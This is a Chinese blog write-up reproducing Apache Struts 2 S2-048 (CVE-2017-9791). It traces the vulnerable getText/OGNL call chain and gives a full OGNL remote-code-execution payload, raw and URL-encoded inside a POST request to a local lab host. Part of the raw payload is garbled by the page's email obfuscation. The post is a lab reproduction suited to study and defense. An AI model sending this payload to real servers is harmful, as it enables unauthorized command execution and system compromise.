2. 程式人生 > 其它 >Apache Struts 2遠端程式碼執行漏洞復現(第二彈)

Apache Struts 2遠端程式碼執行漏洞復現(第二彈)

阿新 發佈:2021-08-16
即S2-048

0x00 漏洞概述

編號為CVE-2017-9791

官方描述是:

It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user, i.e. when using untrusted input as a part of the error message in the ActionMessage

class.

在Struts 2.3.x版本上,Showcase外掛的ActionMessage類處理使用者輸入不當,導致任意程式碼執行。

雖然Struts 2.3.x版本早已官宣退役,但是原始碼值得一看,而且相信還有許多正在服役的Struts 2.3.x專案

影響版本:Struts 2.3.x

0x01 漏洞原始碼

分析基於官方的示例war包

從漏洞描述可知,本質問題在於struts2-struts1-plugin這個jar包。這個庫被用作Struts 1和Struts 2間的銜接,將Struts 1的action封裝為Struts 2的action,以便後者使用。

struts2-struts1-plugin包中的Struts1Action.java有execute()

方法,呼叫了getText()函式,該函式會執行OGNL表示式;getText()函式的輸入又是使用者可控的。

Struts1Action.java

如圖中所示,先呼叫了SaveGangsterAction.execute()方法,然後呼叫了getText()方法。

SaveGangsterAction.java

去檢視一下SaveGangsterAction.execute()的具體實現,檔案位於WEB-INF/classes/org/apache/struts2/showcase/integration/SaveGangsterAction.java。

gform.GetName()被放入messages

,而gform.GetName()的值是從客戶端獲取的。

getText函式

getText()函式的呼叫鏈較長,從Struts1Action.execute()開始追溯。

  1. ActionSupport.getText()

    public String getText(String aTextName) {
    return getTextProvider().getText(aTextName);
}

  2. TextProviderSupport.getText()

    public String getText(String key, String defaultValue, List<?> args) {
    Object[] argsArray = ((args != null && !args.equals(Collections.emptyList())) ? args.toArray() : null);
    if (clazz != null) {
        return LocalizedTextUtil.findText(clazz, key, getLocale(), defaultValue, argsArray);
    } else {
        return LocalizedTextUtil.findText(bundle, key, getLocale(), defaultValue, argsArray);
    }
}

  3. LocalizeTextUtil.findText()

    public static String findText(Class aClass, String aTextName, Locale locale, String defaultMessage, Object[] args) {
    ValueStack valueStack = ActionContext.getContext().getValueStack();
    return findText(aClass, aTextName, locale, defaultMessage, args, valueStack);
}

  4. 到了常規OGNL表示式入口。

0x02 利用流程

訪問靶機

先行測試

發現運算被執行了。

抓包改包

重新訪問/integration/editGangster.action路徑。

構造Payload:

%{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls -l /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

由於系統解析特性,Payload需要經過URL轉碼,注入命令中的空格也要轉義為%20

POST /integration/saveGangster.action HTTP/1.1
Host: 127.0.0.1:52570
Content-Length: 1022
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:52570
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:52570/integration/editGangster.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; JSESSIONID=25C4D4A4B6532931B769FC874B99B7DB
Connection: close

name=%25%7B(%23_%3D'multipart%2Fform-data').(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D'ls%20-l%20%2Ftmp').(%23iswin%3D(%40java.lang.System%40getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3D(%23iswin%3F%7B'cmd.exe'%2C'%2Fc'%2C%23cmd%7D%3A%7B'%2Fbin%2Fbash'%2C'-c'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%23ros%3D(%40org.apache.struts2.ServletActionContext%40getResponse().getOutputStream())).(%40org.apache.commons.io.IOUtils%40copy(%23process.getInputStream()%2C%23ros)).(%23ros.flush())%7D&age=123&__checkbox_bustedBefore=true&description=123

0x03 工具一把梭

Struts 2系列漏洞實在經典,必然有大佬製作相應的檢測工具。

一個較流行的工具:shack2/Struts2VulsTools: Struts2系列漏洞檢查工具 (github.com)

相關推薦

Apache Struts 2遠端程式碼執行漏洞復現第二

即S2-048 0x00 漏洞概述 編號為CVE-2017-9791。 官方描述是: It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it\'s a Struts 1 action

Apache Struts 2遠端程式碼執行漏洞復現第三

Double Kill 0x00 漏洞概述 編號為CVE-2017-5638。 官方描述是: It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn\'t valid an exception is th

[CVE-2012-0392] Apache Struts 2遠端程式碼執行漏洞復現第五

棄之可惜 0x00 漏洞概述 編號為CVE-2012-0392。 即S2-008,實際上是多個漏洞的集合。

Apache Struts 2遠端程式碼執行漏洞復現

沒學會的SSH = Struts2 + Spring + Hibernate Apache Struts 2是一個基於MVC模式的Web應用框架,本質上相當於一個servlet。在MVC設計模式中,Struts 2作為控制器建立模型和檢視的資料互動。

Apache Log4j 2遠端程式碼執行漏洞

0x01漏洞描述 Apache Log4j是一個基於Java的日誌記錄工具,Log4j 2是Log4j的升級產品。該元件存在Java JNDI注入漏洞,當程式將使用者輸入的資料進行日誌,即可觸發此漏洞,成功利用此漏洞可以在目標伺服器上執行任意

F5 BIG-IP 遠端程式碼執行漏洞復現CVE-2020-5902

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

Jenkins-CI 遠端程式碼執行漏洞復現CVE-2017-1000353

0x01 環境 使用vulhub搭建漏洞環境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/

Jackson遠端程式碼執行漏洞復現不使用vluhub,手寫transletBytecodes欄位

今天花了一天的時間復現Jackson遠端程式碼執行漏洞,查詢vulhub可以看到存在CVE-2017-7525的漏洞環境,根據網上的教程,的確可以復現成功。

Apache Struts2 S2-013遠端程式碼執行漏洞復現

墨者學院開的靶場 進入環境 Struts2-013好傢伙,框架直接寫臉上,怕人看不出來= =

KubeSphere 對 Apache Log4j 2 遠端程式碼執行最新漏洞的修復方案

Apache Log4j 2 是一款開源的日誌記錄工具,被廣泛應用於各類框架中。近期,Apache Log4j 2 被爆出存在漏洞漏洞現已公開,本文為 KubeSphere 使用者提供建議的修復方案。

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

Joomla-3.4.6遠端程式碼執行漏洞復現

#01 Joomla簡介 Joomla!是一套自由、開放原始碼的內容管理系統,以PHP撰寫,用於釋出內容在全球資訊網與內部網,通常被用來搭建商業網站、個人部落格、資訊管理系統、Web 服務等,還可以進行二次開發以擴充使用範圍。

S2-052CVE-2017-9805 遠端程式碼執行漏洞復現

0x01 漏洞說明 漏洞編號:CVE-2017-9805S2-052影響版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12漏洞詳情:http://struts.apache.org/docs/s2-052.html

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

CVE-2020-14645Weblogic遠端程式碼執行漏洞復現 漏洞介紹 今日,Oracle官方釋出WebLogic安全更新,其中修復了一個CVSS評分為9.8的嚴重漏洞(CVE-2020-14645),該漏洞通過T3協議進行利用,攻擊者可以實現遠端程式碼執行

Apache Solr 遠端命令執行漏洞復現CVE-2019-0193

一.漏洞介紹 Apache Solr 是一個開源的搜尋伺服器。Solr 使用 Java 語言開發,主要基於 HTTP 和 Apache Lucene 實現。此次漏洞出現在Apache Solr的DataImportHandler,該模組是一個可選但常用的模組,用於從資料庫

Drupal遠端程式碼執行漏洞復現

最好的CMS之一 0x00 漏洞概述 編號為CVE-2018-7600。 Drupal是用PHP開發的開源內容管理框架CMF,由內容管理系統CMS和PHP開發框架Framework共同組成。

嚴重危險級別!Apache Log4j 存在遠端程式碼執行漏洞,Java 日誌框架影響範圍極大

感謝網友 ZERO_A_ONE、aikn、我女兒她媽很萌、你還剩下59s 的線索投遞!

Spring Cloud Gateway 遠端程式碼執行漏洞復現CVE-2022-22947

漏洞說明 2022年3月1日,VMware官方釋出漏洞報告,在使用Spring Colud Gateway的應用程式開啟、暴露Gateway Actuator端點時,會容易造成程式碼注入攻擊,攻擊者可以製造惡意請求,在遠端主機進行任意遠端執行

Spring Framework遠端程式碼執行漏洞復現(CVE-2022-22965)

1.漏洞描述     漏洞名稱 Spring Framework遠端程式碼執行漏洞 公開時間 2022-03-29 更新時間

Office CVE-2017-8570遠端程式碼執行漏洞復現

CVE-2017-8570漏洞是一個邏輯漏洞,利用方法簡單,影響範圍廣。由於該漏洞和三年前的SandWorm沙蟲漏洞非常類似,因此我們稱之為“沙蟲”二代漏洞